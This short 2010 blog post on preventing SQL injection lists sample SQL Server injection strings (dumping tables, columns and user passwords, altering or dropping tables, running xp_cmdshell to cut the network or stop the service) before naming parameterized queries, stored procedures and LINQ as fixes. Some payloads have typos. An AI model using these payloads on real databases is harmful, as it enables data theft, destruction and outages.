Friday, March 26, 2010

How to prevent SQL Injection

How to prevent SQL Injection

Examples that will return if you have used simple query string in your application.

Fetch All:

x’ or ‘t’=’t’ --

Discover all tables

‘union select 0, id, name,0,0,0,0,0,0,0 from sysobjects where xtype = ‘U’ --

Discover all columns

‘union select 0, name,1,0,0,0,0,0,0,0 from syscolumns --

Steal DB Users

‘union select 0, uid, name, password, roles, 0,0,0,0,0,0,0 from sysusers --

Change Cell Phone Number

888-88-8888’; update authors set phone = ‘111-11-1111’ --
Drop table

888-88-8888’; drop table discounts --
Disconnect or brind SQL Server Down

888-88-8888; exec master..xp.cmdshell ‘ipconfig /release’

(note: this depends on what version of sql database you have. Will only works if allowed by the sql database on your machine)

Or to stop sql

888-88-8888; exec master..xp_cmdshell .net stop sqlserver’

To Pervent all these do one of 3 things:

1- Use Parameterized Queries by using SqlParameter calling addSqlParameter

2- Use Stored Procedure

3- Use LINQ



Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)